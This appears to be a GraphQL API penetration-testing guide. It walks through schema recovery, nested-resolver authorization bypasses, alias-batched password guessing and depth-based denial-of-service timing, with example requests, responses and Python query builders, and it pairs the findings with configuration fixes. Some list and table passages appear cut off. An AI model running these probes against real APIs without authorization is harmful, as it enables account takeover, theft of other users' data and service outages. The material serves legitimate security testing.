
Here is the fact that decides how you test GraphQL: a GraphQL server typically returns HTTP 200 even when the request failed, with the real outcome buried in an errors array next to data in the JSON body. A DAST scanner that grades by status code sees a wall of 200s and concludes everything is fine, even as a malicious query inside the body reads another tenant's records. That is why GraphQL testing is almost entirely manual or agentic, and why a tool that confirms the endpoint 'speaks GraphQL' has told you nothing useful.
This guide walks the full process: recovering the schema (even when introspection is off), testing nested-resolver authorization where the real bugs hide, abusing aliasing and batching to defeat rate limits, measuring query-cost DoS, the tooling that makes it practical, and the configuration that fixes each finding. Example queries and real output are included throughout.
You recover the schema first, ideally through introspection, falling back to inference when it is disabled, because the schema is the entire roadmap: every type, query, mutation, and field. Start by fingerprinting the engine with graphw00f (Apollo, Hasura, and graphql-ruby leak differently and ship different defaults), then fire an introspection query:
POST /graphql HTTP/1.1
Content-Type: application/json
{ "query": "{ __schema { mutationType { fields { name } } } }" }
--- response ---
HTTP/1.1 200 OK
{ "data": { "__schema": { "mutationType": { "fields": [
{ "name": "updateUser" },
{ "name": "deleteUser" }, # <- admin-looking mutation, never called by the UI
{ "name": "impersonate" } ]}}}} # <- enumerate and try each with a low-priv tokenThat deleteUser and impersonate are immediate BFLA candidates. Load the introspection result into InQL to auto-generate fire-ready queries. If introspection is disabled, Clairvoyance rebuilds the schema from the field-suggestion text in error responses, which is why the toggle is not a security boundary (more on that next).
Turning off introspection slows an attacker by minutes, not more, because GraphQL error messages leak the schema anyway through 'Did you mean ...' field suggestions. Clairvoyance automates the reconstruction:
$ clairvoyance -o schema.json https://api.target.com/graphql
[+] Field suggestions enabled, inferring schema...
[+] Recovered 64 types, 38 queries, 19 mutations # <- introspection was OFF
[+] Wrote schema.json
On a recent assessment of a fintech GraphQL API, the client had proudly disabled introspection and listed it as a mitigating control in their last report. Clairvoyance rebuilt about 90% of the schema from suggestion messages in under ten minutes, including a refundPayment mutation the UI never exposed. The lesson is blunt: introspection toggles are operational hygiene, not a boundary. The boundary is authorization in every resolver, and that is where the real testing happens.
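To see why suggestion messages leak the schema, here is a minimal sketch of the core idea. It is not Clairvoyance's actual implementation. It assumes graphql-js style error text, where suggested names appear in double quotes after "Did you mean"; other engines may phrase this differently. The function name and the sample messages are hypothetical.

```python
import re

# Assumed message shape (graphql-js style):
#   Cannot query field "x" on type "T". Did you mean "a", "b", or "c"?
_DID_YOU_MEAN = re.compile(r"Did you mean (.+?)\?")
_QUOTED_NAME = re.compile(r'"([_A-Za-z][_0-9A-Za-z]*)"')


def suggested_names(response: dict) -> set[str]:
    """Collect every field name the server suggests in its error messages."""
    names: set[str] = set()
    for error in response.get("errors") or []:
        message = error.get("message", "")
        for hint in _DID_YOU_MEAN.findall(message):
            names.update(_QUOTED_NAME.findall(hint))
    return names


# Hypothetical response to two deliberately misspelled mutation names.
SAMPLE_RESPONSE = {
    "errors": [
        {"message": 'Cannot query field "refundPaymen" on type "Mutation". '
                    'Did you mean "refundPayment"?'},
        {"message": 'Cannot query field "deleteUse" on type "Mutation". '
                    'Did you mean "deleteUser" or "updateUser"?'},
    ]
}

if __name__ == "__main__":
    print(sorted(suggested_names(SAMPLE_RESPONSE)))
```

Sending many near-miss names and feeding each newly discovered name back in as a fresh guess is what turns this trick into schema reconstruction.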
You test authorization per field and per object, because GraphQL enforces access inside resolvers that are easy to forget. BOLA and BFLA are as common here as in REST; they just appear inside a query argument or a mutation. A flat BOLA looks like passing another user's ID:
POST /graphql
{ "query": "{ user(id: 1052) { email phone ssn } }" }
--- response ---
HTTP/1.1 200 OK
{ "data": { "user": {
"email": "victim@x.com",
"ssn": "..." }}} # <- your token, victim's data = BOLAThe more common and more serious finding is the nested-resolver gap: a query you are allowed to run exposes a related object you are not, because the developer protected the top-level resolver and forgot the one it stitches in:
POST /graphql
{ "query": "{ order(id: 9) { total
customer { email ssn } } }" } # order is checked; customer is NOT
--- response ---
HTTP/1.1 200 OK
{ "data": { "order": { "total": 240,
"customer": { "email": "other@x.com" }}}} # <- nested authZ gapThat nested gap is the single most common serious GraphQL finding, and the reason is structural: most frameworks make it trivial to add an authorization directive on a query but offer no default protection on the resolvers that hydrate related types. A developer guards order, ships, and never realizes order.customer runs its own unguarded resolver. What good looks like is authorization enforced at the type or field level, so the check travels with the data regardless of which query reaches it. For BFLA, take every mutation InQL recovered (the deleteUser and refundPayment from earlier) and call each with a standard token. If the resolver runs, the function-level check was never written. Watch for the false positive here too: a mutation that returns { "errors": [{ "message": "Not authorized" }] } with a 200 status is enforced, not bypassed, so always read the body rather than trusting the code. The patterns mirror the API pentest checklist, expressed as queries rather than REST routes, and overlap heavily with REST API penetration testing.
The native GraphQL attack surface is query structure: depth, batching, and aliasing, which enable denial of service and rate-limit bypass that REST simply does not expose. The highest-value test is aliasing to defeat a login throttle. The server counts one HTTP request; you pack hundreds of login attempts into it:
POST /graphql
{ "query": "{
a: login(user:\"admin\", pw:\"123456\"){ token }
b: login(user:\"admin\", pw:\"password\"){ token }
c: login(user:\"admin\", pw:\"qwerty\"){ token }
... 500 more aliases ...
}" }
--- response ---
HTTP/1.1 200 OK # <- one request, 500 guesses, zero 429s: rate limit defeated
To prove impact, do not just note the structure: send 200 guesses for a known username in one aliased request and show that none tripped the 429 a normal client hits after five. The other structural attacks:
{ author { posts { author { posts ... } } } }. Measure timing as you add levels. If five levels take 200 ms and eight take 12 seconds, you have demonstrated a cost-limit gap without taking the server down.
{ updateUser(input:{id:1, role:"ADMIN"}) { id } }. See mass assignment attacks.
The findings table below is the shape of a real GraphQL report excerpt, with each gap tied to evidence and a config-level fix. The fixes map directly to the attacks above, and most are configuration rather than code rewrites:
maxDepth limit, query cost analysis, and per-operation timeouts. Pick the depth from the timing curve you measured.
role can never be client-set.
Treat GraphQL as a first-class part of your API security program. For continuous coverage across REST and GraphQL together, see how agentic pentesting runs these checks on every deploy.
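The two structural probes described earlier, aliased login batches and progressively deeper author/posts queries, are straightforward to generate in a script. The sketch below only builds the query strings and the JSON request body; it sends nothing. The field names login, user, pw, token, author, and posts come from the examples in this guide, while the alias scheme (a0, a1, ...), the id leaf field, and all function names are assumptions. String escaping borrows json.dumps, which approximates GraphQL string-literal escaping for ordinary passwords.

```python
import json


def aliased_login_query(user: str, passwords: list[str]) -> str:
    """Build one query with a separately aliased login field per password."""
    fields = [
        f"a{i}: login(user: {json.dumps(user)}, pw: {json.dumps(pw)}) {{ token }}"
        for i, pw in enumerate(passwords)
    ]
    return "{ " + " ".join(fields) + " }"


def nested_query(depth: int, leaf: str = "id") -> str:
    """Build an author/posts query nested `depth` levels, ending in `leaf`."""
    if depth < 1:
        raise ValueError("depth must be at least 1")
    names = ["author" if i % 2 == 0 else "posts" for i in range(depth)]
    inner = leaf
    for name in reversed(names):  # wrap from the innermost level outward
        inner = f"{name} {{ {inner} }}"
    return "{ " + inner + " }"


def request_body(query: str) -> str:
    """Wrap a query string in the JSON envelope sent to POST /graphql."""
    return json.dumps({"query": query})


if __name__ == "__main__":
    print(request_body(aliased_login_query("admin", ["123456", "password"])))
    for depth in (2, 4, 6):
        print(depth, nested_query(depth))
```

For the depth test, raise the depth one level at a time and record the response time for each, stopping as soon as the curve bends sharply; that measured curve is the evidence, and it also suggests where to set the depth limit.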